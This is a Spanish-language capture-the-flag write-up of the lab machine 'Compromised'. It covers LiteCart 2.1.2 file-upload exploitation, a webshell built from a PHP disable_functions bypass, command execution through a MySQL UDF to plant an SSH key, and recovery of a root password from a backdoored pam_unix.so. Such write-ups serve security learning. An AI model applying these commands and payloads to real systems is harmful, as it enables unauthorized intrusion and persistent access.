# Compromised

**OS**: Linux \
**Dificultad**: Difícil \
**Puntos**: 40

## Resumen
- Gobuster
- LiteCart 2.1.2 - Arbitrary File Upload
- Mysql function
- Logs files
- IDA Framework
- Reversing pam_unix.so

## Nmap Scan

`nmap -Pn -sC -sV -p- 10.10.10.207`

```
Nmap scan report for 10.10.10.207
Host is up (0.066s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
|   256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_  256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://10.10.10.207/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

El escaneo de red nos muestra los puertos **22** y **80**. Utilizando **gobuster** enumeramos directorios y archivos en la aplicación web.

`gobuster dir -u http://10.10.10.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x php,txt`

![1](img/1.png)

Podemos ver que hay un directorio interesante llamado **backup**. Accediendo a él a través de la web nos encontramos con el archivo **a.tar.gz**.

`http://10.10.10.207/backup/`

![2](img/2.png)

Al extraer los archivos nos damos cuenta de que es una copia de la aplicación web que está alojada en el puerto 80. Enumerando las carpetas en la ruta **admin/login.php** hay un comentario que hace referencia a una archivo TXT.

![3](img/3.png)

Si accedemos a él desde el navegador el contenido es un usuario y un password.

`http://10.10.10.207/shop/admin/.log2301c9430d8593ae.txt`

![4](img/4.png)

```
admin : theNextGenSt0r3!~
```

Ahora podemos acceder a la parte de administración con las credenciales obtenidas y se visualiza la versión de la aplicación web.

![5](img/5.png)

### LiteCart 2.1.2 - Arbitrary File Upload

> Plataforma de comercio electrónico LiteCart construida con PHP, jQuery y HTML 5.

Investigando exploits públicos para la versión de LiteCart, esta versión cuenta con una función vulnerable para subir archivos. Podemos tomar ventaja para subir nuestra webshell. Probando diferentes archivos no era posible obtener una webshell lo que se hizo fue leer la configuración de PHP.

Subimos un archivo con la extensión PHP y capturamos la request.

##### info.php
```php
<?php phpinfo();?>
```

`http://10.10.10.207/shop/admin/?app=vqmods&doc=vqmods`

![6](img/6.png)

Modificamos el parámetro **Content-Type** para dejarlo como **application/xml**.

![7](img/7.png)

Accedemos al archivo que subimos en la siguiente ruta.

`http://10.10.10.207/shop/vqmod/xml/info.php`

![8](img/8.png)

Podemos ver las funciones deshabilitadas que tiene PHP, es por esto que no nos permitía ejecutar system u otras funciones para obtener RCE. Encontramos el siguiente [script](https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass) para hacer bypass de las funciones y conseguir una web shell.

Procedemos a repetir los pasos anteriores y antes de subir el script modificamos la siguiente linea.

`pwn("uname -a");` => `pwn($_GET['cmd']);`

Consultamos el archivo que se subió.

`http://10.10.10.207/shop/vqmod/xml/shell.php?cmd=id`

![9](img/9.png)

## Escalada de Privilegios (User)

Enumerando los archivos de la página web que descargamos **config.inc.php** contiene usuario y password para **MySQL**.

##### /includes/config.inc.php
```
define('DB_TYPE', 'mysql');
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'changethis');
define('DB_DATABASE', 'ecom');
```

Al leer el archivo **passwd** existe el usuario **mysql** y su directorio home es **/var/lib/mysql**.

`cat /etc/passwd`

![10](img/10.png)

Utilizando el comando mysql y las credenciales podemos ver las funciones que están activas en la base de datos.

`mysql -u root -p'changethis' -e 'SELECT * FROM mysql.func'`

![11](img/11.png)

La función **exec_cmd** esta habilitada lo que nos permite ejecutar comandos del sistema.

`mysql -u root -p'changethis' -e 'SELECT exec_cmd("id")'`

![12](img/12.png)

Probando diferentes cosas nos damos cuenta de que tiene el directorio **.ssh**, escribimos nuestra llave publica para acceder por SSH.

`mysql -u root -p'changethis' -e 'SELECT exec_cmd("echo ''<id_rsa>'' > /var/lib/mysql/.ssh/authorized_keys")'`

![13](img/13.png)

Nos conectamos por el servicio SSH con el usuario mysql.

`ssh mysql@10.10.10.207`

![14](img/14.png)

Podemos ver un archivo llamado **strace-log.dat** que contiene un password.

`cat strace-log.dat | grep password`

![15](img/15.png)

```
sysadmin : 3*NLJE32I$Fe
```

Utilizamos el password obtenido con el usuario **sysadmin**.

`su sysadmin`

![16](img/16.png)

## Escalada de Privilegios (Root)

Dentro del archivo **strace-log.dat** también podemos ver una ruta **/etc/pam.d/common-password**. Leyendo el archivo **common-password** nos damos cuenta de que hace mención a un binario llamado **pam_permit.so**.

`cat /etc/pam.d/common-password`

![17](img/17.png)

Buscando el binario obtenemos la ruta **/lib/x86_64-linux-gnu/security/** que contiene varios binarios.

`find / -name pam_permit.so 2>/dev/null`

![18](img/18.png)

Uno de los binarios interesante es **pam_unix.so**.

> Este es el módulo de autenticación estándar de Unix. Utiliza llamadas estándar de las bibliotecas del sistema para recuperar y configurar la información de la cuenta, así como la autenticación. Por lo general, esto se obtiene del archivo /etc/passwd y /etc/shadow también si está habilitado.

`ls -la /lib/x86_64-linux-gnu/security/`

![19](img/19.png)

Descargamos el archivo mediante el comando **scp** con el usuario mysql.

`scp mysql@10.10.10.207:/lib/x86_64-linux-gnu/security/pam_unix.so .`

Utilizando el programa **IDA** podemos hacer reversing del binario y en la función **pam_sm_authenticate** visualizamos un par de cadenas en hexadecimal.

![20](img/20.png)

Transformando las cadenas a texto se ve algo parecido a un password.

![21](img/21.png)

```
root : zlke~U3Env82m2-
```

Con el password obtenido anteriormente obtenemos acceso como el usuario root.

`su root`

![22](img/22.png)

## Referencias
https://www.exploit-db.com/exploits/45267 \
https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp/php-useful-functions \
https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass \
https://book.hacktricks.xyz/pentesting/pentesting-mysql \
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pam_configuration_files \
http://www.linux-pam.org/Linux-PAM-html/sag-pam_unix.html \
https://web.mit.edu/rhel-doc/4/RH-DOCS/rhel-rg-es-4/s1-pam-sample-simple.html \
https://www.hex-rays.com/products/ida/support/download_freeware/
